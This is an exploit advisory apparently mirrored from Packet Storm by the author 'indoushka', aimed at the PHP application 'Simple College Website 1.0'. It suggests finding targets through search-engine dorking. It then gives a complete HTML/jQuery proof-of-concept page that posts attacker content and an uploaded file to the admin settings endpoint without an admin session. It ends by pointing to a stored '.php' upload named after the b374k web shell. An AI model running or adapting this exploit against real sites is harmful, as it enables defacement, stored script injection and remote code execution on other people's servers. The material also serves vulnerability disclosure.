## https://sploitus.com/exploit?id=PACKETSTORM:180360
=============================================================================================================================================
| # Title : Simple College Website 1.0 WYSIWYG Settings Management Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |
| # Vendor : https://www.sourcecodester.com/php/14548/simple-college-website-using-htmlphpmysqli-source-code.html |
=============================================================================================================================================
poc :
[+] Dorking in Google or another search engine to find installations.
[+] Part 01 : about-us.php
[+] The form below posts attacker-chosen HTML (the `about_us` field, edited through the Froala WYSIWYG editor — reported as v4.2.1 in the vendor application; this PoC page itself loads 4.0.1 from cdnjs) to the settings save endpoint, which stores it in the database. For a page hosted elsewhere to do this, the `save_settings` action has to accept the request without a valid admin session or anti-CSRF token; that is the precondition this PoC relies on, and it is not demonstrated separately here.
[+] Target URL : the form is submitted with jQuery `$.ajax` (not the fetch API); set the `url:` value inside the `$('#manage-settings').submit(...)` handler to the target's `admin/ajax.php?action=save_settings`.
[+] save payload as poc.html
[+] payload :
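<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Settings Management</title>
  <!-- Froala Editor CSS.
       NOTE: the advisory header names Froala 4.2.1, but this page pulls 4.0.1 from
       cdnjs. None of the third-party assets below carry an `integrity` (SRI) attribute,
       so the CDN is trusted blindly; fine for a local PoC, not for anything deployed. -->
  <link href="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/css/froala_editor.pkgd.min.css" rel="stylesheet">
  <!-- Bootstrap CSS -->
  <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet">
  <style>
    /* Custom Styles */
    #cimg {
      max-width: 100%;
      height: auto;
    }
    /* Full-screen translucent overlay inserted by start_load() and removed by end_load(). */
    #preloader2 {
      position: fixed;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      background: rgba(0, 0, 0, 0.5);
      display: flex;
      justify-content: center;
      align-items: center;
      z-index: 9999;
    }
    .form-group {
      margin-bottom: 1rem;
    }
    .form-group label {
      display: block;
      margin-bottom: .5rem;
    }
    .form-group input, .form-group textarea {
      width: 100%;
      padding: .5rem;
      box-sizing: border-box;
    }
  </style>
</head>
<body>
  <div class="container">
    <!-- Field names (name, email, contact, about_us, img) mirror what the target's
         save_settings action reads; the submit handler below posts them as multipart/form-data. -->
    <form id="manage-settings" method="post" enctype="multipart/form-data">
      <div class="form-group">
        <label for="name"> Name</label>
        <input type="text" id="name" name="name" required>
      </div>
      <div class="form-group">
        <label for="email">Email</label>
        <input type="email" id="email" name="email" required>
      </div>
      <div class="form-group">
        <label for="contact">Contact</label>
        <input type="tel" id="contact" name="contact" required>
      </div><!-- was left unclosed in the original, which swallowed the container's closing tag -->
      <div class="form-group">
        <label for="about">About Content</label>
        <textarea class="text-jqte" id="about" name="about_us"></textarea>
      </div>
      <div class="form-group">
        <label for="img">Cover Image</label>
        <!-- accept="image/*" is only a file-picker hint; it does not constrain what is sent. -->
        <input type="file" id="img" name="img" accept="image/*" onchange="displayImg(this, this)">
        <img id="cimg" src="" alt="Selected Image Preview">
      </div>
      <button type="submit" class="btn btn-primary">Save Settings</button>
    </form>
  </div>
  <div class="modal fade" id="viewer_modal" role='dialog'>
    <div class="modal-dialog modal-md" role="document">
      <div class="modal-content">
        <button type="button" class="btn-close" data-dismiss="modal"><span class="fa fa-times"></span></button>
        <img src="" alt="">
      </div>
    </div>
  </div>
  <!-- jQuery -->
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
  <!-- Froala Editor JS -->
  <script src="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/js/froala_editor.pkgd.min.js"></script>
  <!-- Bootstrap JS (for modals) -->
  <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.bundle.min.js"></script>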
<script>
// Preview the chosen cover image: read the first selected file as a data: URL
// and point #cimg at it. `_this` is unused but kept because the inline
// onchange="displayImg(this, this)" call site passes it.
function displayImg(input, _this) {
  const file = input.files && input.files[0];
  if (!file) {
    return;
  }
  const reader = new FileReader();
  reader.onload = (evt) => {
    $('#cimg').attr('src', evt.target.result);
  };
  reader.readAsDataURL(file);
}
// Once the DOM is ready, attach the Froala WYSIWYG editor to the About textarea
// ($(fn) is jQuery's shorthand for $(document).ready(fn)).
$(function () {
  const editorInstance = new FroalaEditor('.text-jqte');
});
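// Intercept the form submit and POST its fields (name, email, contact, about_us,
// img) as multipart/form-data to the target's save_settings action.
// Set `url` to the instance under test.
// Caveat when poc.html is served from another origin: the browser still sends
// this request (multipart/form-data needs no CORS preflight), but it will not
// expose the response body unless the server returns CORS headers, so the
// success branch may never run even though the server processed the upload.
// Check the target directly rather than relying on the toast.
$('#manage-settings').submit(function (e) {
  e.preventDefault();
  start_load();
  $.ajax({
    url: 'http://127.0.0.1/college_website/admin/ajax.php?action=save_settings',
    data: new FormData(this),
    cache: false,
    contentType: false, // let the browser set the multipart boundary
    processData: false, // send the FormData object as-is
    method: 'POST',
    type: 'POST',
    error: (err) => {
      console.log(err);
      end_load(); // the original left the overlay up forever on failure
    },
    success: function (resp) {
      // The endpoint signals success with a bare "1"; tolerate trailing whitespace.
      if (String(resp).trim() === '1') {
        alert_toast('Data successfully saved.', 'success');
        setTimeout(function () {
          location.reload();
        }, 1000);
      } else {
        // Unexpected body (error text, login page, ...): log it and clear the overlay
        // instead of hanging the page, which is what the original did.
        console.log(resp);
        end_load();
      }
    }
  });
});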
// Show the blocking overlay: prepend the #preloader2 element to <body>.
window.start_load = function () {
  const overlay = $('<div id="preloader2"></div>');
  $('body').prepend(overlay);
};
// Hide the blocking overlay: fade #preloader2 out quickly, then detach it.
window.end_load = function () {
  const overlay = $('#preloader2');
  overlay.fadeOut('fast', () => {
    overlay.remove();
  });
};
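// Show a media file in #viewer_modal: a <video> for .mp4, an <img> for anything else.
// The element is built with jQuery attribute setters rather than by concatenating
// $src into an HTML string, so a quote or '>' inside $src cannot break out of the
// src attribute and inject markup.
window.viewer_modal = function ($src = '') {
  start_load();
  const src = String($src);
  // Extension = text after the last '.' of the final path segment, ignoring any
  // ?query or #fragment. (The original used split('.')[1], i.e. the *second*
  // dot-separated piece, which is wrong for hosts like 127.0.0.1 or for file
  // names containing several dots.)
  const path = src.split(/[?#]/)[0];
  const fileName = path.slice(path.lastIndexOf('/') + 1);
  const dot = fileName.lastIndexOf('.');
  const ext = dot === -1 ? '' : fileName.slice(dot + 1).toLowerCase();
  const view = ext === 'mp4'
    ? $('<video>', { src, controls: true, autoplay: true })
    : $('<img>', { src });
  $('#viewer_modal .modal-content video,#viewer_modal .modal-content img').remove();
  $('#viewer_modal .modal-content').append(view);
  $('#viewer_modal').modal({
    show: true,
    backdrop: 'static',
    keyboard: false,
    focus: true
  });
  end_load();
};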
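// Fetch an HTML fragment from $url and show it in #uni_modal.
// $title and the response body are both inserted with .html(), i.e. treated as
// trusted markup — only point this at same-origin admin endpoints.
// $size, when non-empty, is added as an extra class on .modal-dialog; otherwise
// the dialog is reset to "modal-dialog modal-md".
window.uni_modal = function ($title = '', $url = '', $size = '') {
  start_load();
  $.ajax({
    url: $url,
    error: (err) => {
      console.log(err);
      alert('An error occurred');
      end_load(); // the original left the overlay up on failure
    },
    success: function (resp) {
      if (!resp) {
        // Empty body: nothing to show, but do not leave the page blocked.
        end_load();
        return;
      }
      $('#uni_modal .modal-title').html($title);
      $('#uni_modal .modal-body').html(resp);
      const dialog = $('#uni_modal .modal-dialog');
      if ($size !== '') {
        dialog.addClass($size);
      } else {
        dialog.removeAttr('class').addClass('modal-dialog modal-md');
      }
      $('#uni_modal').modal({
        show: true,
        backdrop: 'static',
        keyboard: false,
        focus: true
      });
      end_load();
    }
  });
};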
// Arm the confirm dialog: the #confirm button's onclick is set to the source text
// "$func(p1,p2,...)" and $msg is shown as HTML in the modal body.
// NOTE(review): the onclick string is evaluated as JavaScript by the browser, so
// $func and every element of $params are code, not data. Callers must never pass
// user-controlled values here; a closure-based handler would be the safe shape.
window._conf = function ($msg = '', $func = '', $params = []) {
  const handlerSource = `${$func}(${$params.join(',')})`;
  const modal = $('#confirm_modal');
  modal.find('#confirm').attr('onclick', handlerSource);
  modal.find('.modal-body').html($msg);
  modal.modal('show');
};
// Show a Bootstrap toast with $msg (inserted as HTML) for three seconds, tinted by
// $bg: one of success / danger / info / warning. Any other $bg clears the tint.
window.alert_toast = function ($msg = 'TEST', $bg = 'success') {
  const toast = $('#alert_toast');
  toast.removeClass('bg-success bg-danger bg-info bg-warning');
  switch ($bg) {
    case 'success':
      toast.addClass('bg-success');
      break;
    case 'danger':
      toast.addClass('bg-danger');
      break;
    case 'info':
      toast.addClass('bg-info');
      break;
    case 'warning':
      toast.addClass('bg-warning');
      break;
    default:
      break;
  }
  toast.find('.toast-body').html($msg);
  toast.toast({ delay: 3000 }).toast('show');
};
</script>
</body>
</html>
[+] Path : the uploaded cover image is referenced from a CSS rule as `background: url(admin/assets/uploads/1724235960_b374k.php);`. The `.php` extension shows the file sent in the `img` field was stored under its original extension (the form's `accept="image/*"` is only a browser-side hint and constrains nothing server-side). If the upload handler does not validate extension or content, this is an unrestricted file upload reachable at that path in addition to the stored-content issue — confirm against the server-side upload code.
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================